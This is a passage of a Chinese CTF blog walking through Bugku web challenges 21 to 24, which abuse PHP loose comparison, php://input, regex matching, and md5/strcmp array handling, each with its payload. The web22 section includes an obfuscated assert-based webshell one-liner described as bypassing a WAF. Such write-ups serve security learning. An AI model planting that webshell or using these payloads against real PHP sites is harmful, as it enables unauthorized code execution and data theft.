class="hljs-keyword">return</span> ;<br>&#125;<br><span class="hljs-variable">$data</span> = @file_get_contents(<span class="hljs-variable">$a</span>,&#x27;r&#x27;);     <span class="hljs-comment">//将变量a的值读入$data</span><br><span class="hljs-keyword">if</span>(<span class="hljs-variable">$data</span>==<span class="hljs-string">&quot;bugku is a nice plateform!&quot;</span> and <span class="hljs-variable">$id</span>==0 and <span class="hljs-built_in">strlen</span>(<span class="hljs-variable">$b</span>)&gt;5 and eregi(<span class="hljs-string">&quot;111&quot;</span>.<span class="hljs-built_in">substr</span>(<span class="hljs-variable">$b</span>,0,1),<span class="hljs-string">&quot;1114&quot;</span>) and <span class="hljs-built_in">substr</span>(<span class="hljs-variable">$b</span>,0,1)!=4)  <span class="hljs-comment">//①</span><br>&#123;<br>	<span class="hljs-variable">$flag</span> = <span class="hljs-string">&quot;flag&#123;***********&#125;&quot;</span><br>&#125;<br><span class="hljs-keyword">else</span><br>&#123;<br>	<span class="hljs-keyword">print</span> <span class="hljs-string">&quot;never never never give up !!!&quot;</span>;<br>&#125;<br>?&gt;<br></code></pre></td></tr></table></figure>

<p>①：首先要求data的值，即a的内容为bugku is a nice plateform!，id不为0，且长度大于5，substr($b,0,1)为截取b的第一个字符(从第0个开始读取1个)，111+b的第一个字符需要在1114中出现，且b的第一个字符不能为4</p>
<p>总结一下，想要输出flag，必须满足几个条件：a要为bugku is a nice plateform!，id不能为空但需要id<code>==</code>0，此处可以使用0e1234来绕过（会识别为科学计数法），也可以使用0abc来绕过，php是弱类型语言，数字和字符(串)的比较是存在类型转换的，对字符串来说是以开头的数字为准，所以在松散(<code>==</code>)比较中，0<code>==</code>0abc是正确的，详情可以百度<code>==</code>和<code>===</code>的差别，最后还要满足上文①中b的要求，这里可以用.12345或*12345来绕过，这两个符号为php的通配符，放在此处取第一个字符后会被当成是任意字符</p>
<p>最终payload：?id=0e123&amp;a=php://input&amp;b=.12345，另外需要在下面加上post传参bugku is a nice plateform!</p>
<p>得到flag</p>
<p><img src="https://img-blog.csdnimg.cn/20210425102358596.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lpZnVqaWFkZW5n,size_16,color_FFFFFF,t_70#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<h4 id="web22："><a href="#web22：" class="headerlink" title="web22："></a>web22：</h4><p>这题并没有把提示放在题目中，而是放在了题目入口处</p>
<p>送给大家一个过狗一句话</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-variable">$poc</span>=<span class="hljs-string">&quot;a#s#s#e#r#t&quot;</span>; <span class="hljs-variable">$poc_1</span>=explode(<span class="hljs-string">&quot;#&quot;</span>,<span class="hljs-variable">$poc</span>); <span class="hljs-variable">$poc_2</span>=<span class="hljs-variable">$poc_1</span>[0].<span class="hljs-variable">$poc_1</span>[1].<span class="hljs-variable">$poc_1</span>[2].<span class="hljs-variable">$poc_1</span>[3].<span class="hljs-variable">$poc_1</span>[4].<span class="hljs-variable">$poc_1</span>[5]; <span class="hljs-variable">$poc_2</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;s&#x27;</span>])<br></code></pre></td></tr></table></figure>

<p>分析一下，这一串代码总结下来：</p>
<p>1.<code>$poc=a#s#s#e#r#t</code></p>
<p>2.<code>$poc_1=explode(&quot;#&quot;,$poc)</code>，这个函数的意思是以#为定界符，分隔字符串<code>$poc</code>，即<code>$poc_1=assert</code></p>
<p>3.<code>$poc_2=$poc_1=assert，$poc_2($_GET[&#39;s&#39;])</code>的含义就是<code>assert($\_GET[&#39;s&#39;])</code>，assert函数可以进行代码执行</p>
<p>那接下来就好办了，先dir看下当前目录下的文件</p>
<p><img src="https://img-blog.csdnimg.cn/20210425102545534.png#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>看到了flag文件，直接cat查看，拿到flag</p>
<p><img src="https://img-blog.csdnimg.cn/20210425102605165.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lpZnVqaWFkZW5n,size_16,color_FFFFFF,t_70#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<h4 id="web23："><a href="#web23：" class="headerlink" title="web23："></a>web23：</h4><p>点击进入题目，直接给了一段源码</p>
<p><img src="https://img-blog.csdnimg.cn/20210425102630421.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lpZnVqaWFkZW5n,size_16,color_FFFFFF,t_70#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> <br>highlight_file(<span class="hljs-string">&#x27;2.php&#x27;</span>);<br><span class="hljs-variable">$key</span>=<span class="hljs-string">&#x27;flag&#123;********************************&#125;&#x27;</span>;<br><span class="hljs-variable">$IM</span>= preg_match(<span class="hljs-string">&quot;/key.*key.&#123;4,7&#125;key:\/.\/(.*key)[a-z][[:punct:]]/i&quot;</span>, trim(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;id&quot;</span>]), <span class="hljs-variable">$match</span>);<br><span class="hljs-keyword">if</span>( <span class="hljs-variable">$IM</span> )&#123; <br>  <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;key is: &#x27;</span>.<span class="hljs-variable">$key</span>);<br>&#125;<br><span class="hljs-meta">?&gt;</span> <br></code></pre></td></tr></table></figure>

<p>一开始看到源码中提示了一个文件2.php，切换到这个文件，会发现返回的页面依旧是这个页面，没办法，那就看看源码</p>
<p>源码中给$key赋值了flag，并在下面的if判断中利用die函数输出了这个值，那么我们现在的目标就是让下面这个if判断成立，要成立就要$IM为真，此处$IM为preg_match函数的一个返回值，这个函数是判断搜索第二个参数与第一个参数的一个正则匹配，即第二个参数<code>trim($_GET[&quot;id&quot;])</code>中是否存在第一个参数<code>&quot;/key.*key.&#123;4,7&#125;key:\/.\/(.*key)[a-z][[:punct:]]/i&quot;</code>，如果存在返回true，不存在返回false</p>
<p>解释一下这个参数中涉及到的一些符号</p>
<figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs lua">. 为通配符，表示一个任意非\n和\r单字符<br><br>.*为字符串通配符，详情可百度<span class="hljs-string">&quot;贪婪匹配&quot;</span><br><br>\为转义符<br><br>[a-z]为任意小写字母<br><br><span class="hljs-string">[[:punct:]]</span>为任意符号<br><br>/i为不区分大小写<br><br>()标记一个子表达式的开始和结束位置，此处不用理会<br></code></pre></td></tr></table></figure>

<p>最后得到payload: ?id=keyakeyaaaakey:/a/akeya?</p>
<p>成功拿到flag</p>
<p><img src="https://img-blog.csdnimg.cn/20210425102656753.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lpZnVqaWFkZW5n,size_16,color_FFFFFF,t_70#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<h4 id="web24："><a href="#web24：" class="headerlink" title="web24："></a>web24：</h4><p>点开题目之后，是一大段文字，讲了个小段子，玩了一下php的梗</p>
<p><img src="https://img-blog.csdnimg.cn/20210425102715155.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lpZnVqaWFkZW5n,size_16,color_FFFFFF,t_70#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>查看页面源码，发现给了一个链接</p>
<p><img src="https://img-blog.csdnimg.cn/20210425102735413.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lpZnVqaWFkZW5n,size_16,color_FFFFFF,t_70#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>点击进去，这个txt给了一段源码</p>
<p><img src="https://img-blog.csdnimg.cn/20210425102757162.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lpZnVqaWFkZW5n,size_16,color_FFFFFF,t_70#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;v1&#x27;</span>]) &amp;&amp; <span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;v2&#x27;</span>]) &amp;&amp; <span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;v3&#x27;</span>]))&#123;<br>    <span class="hljs-variable">$v1</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;v1&#x27;</span>];<br>    <span class="hljs-variable">$v2</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;v2&#x27;</span>];<br>    <span class="hljs-variable">$v3</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;v3&#x27;</span>];<br>    <span class="hljs-keyword">if</span>(<span class="hljs-variable">$v1</span> != <span class="hljs-variable">$v2</span> &amp;&amp; md5(<span class="hljs-variable">$v1</span>) == md5(<span class="hljs-variable">$v2</span>))&#123;<br>        <span class="hljs-keyword">if</span>(!strcmp(<span class="hljs-variable">$v3</span>, <span class="hljs-variable">$flag</span>))&#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-variable">$flag</span>;<br>        &#125;<br>    &#125;<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>看了源码之后，会发现这题和前面的web16很像，都是既要md5值相等，又要原值不相等</p>
<p>有两个思路，一是利用md5()函数对数组不起效，将两个变量以数组形式输入，这样两个md5()都返回null，满足相等条件</p>
<p>二是利用php在处理长的字符串时会转换成科学计数法，我们可以找两个md5值是0e开头的，它在解析时会当做0的xx次方，都是0，满足条件</p>
<p>这里还多出来一个strcmp函数，这个函数的作用是比较两个字符串，且只有两个字符串相等时，才会返回0，这里利用strcmp对数组不起作用，直接返回0来绕过</p>
<p>构造payload：?v1[]=1&amp;v2[]=2&amp;v3[]=1</p>
<p>得到flag</p>
<p>看了源码之后，会发现这题和前面的web16很像，都是既要md5值相等，又要原值不相等</p>
<p>有两个思路，一是利用md5()函数对数组不起效，将两个变量以数组形式输入，这样两个md5()都返回null，满足相等条件</p>
<p>二是利用php在处理长的字符串时会转换成科学计数法，我们可以找两个md5值是0e开头的，它在解析时会当做0的xx次方，都是0，满足条件</p>
<p>这里还多出来一个strcmp函数，这个函数的作用是比较两个字符串，且只有两个字符串相等时，才会返回0，这里利用strcmp对数组不起作用，直接返回0来绕过</p>
<p>构造payload：?v1[]=1&amp;v2[]=2&amp;v3[]=1</p>
<p>得到flag</p>
<p><img src="https://img-blog.csdnimg.cn/20210425102911912.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3lpZnVqaWFkZW5n,size_16,color_FFFFFF,t_70#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/ctf/">ctf</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    作者：CompactDisk，本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/05/13/bugku%20web%E7%9F%A5%E8%AF%86%E7%82%B9%E6%80%BB%E7%BB%93_1/">
                        <span class="hidden-mobile">bugku web总结_1</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a  target="_blank" rel="nofollow noopener"><span>CompactDisk</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.2/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      $('#local-search-input').on('click', function() {
        searchFunc(path, 'local-search-input', 'local-search-result');
      });
      $('#modalSearch').on('shown.bs.modal', function() {
        $('#local-search-input').focus();
      });
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
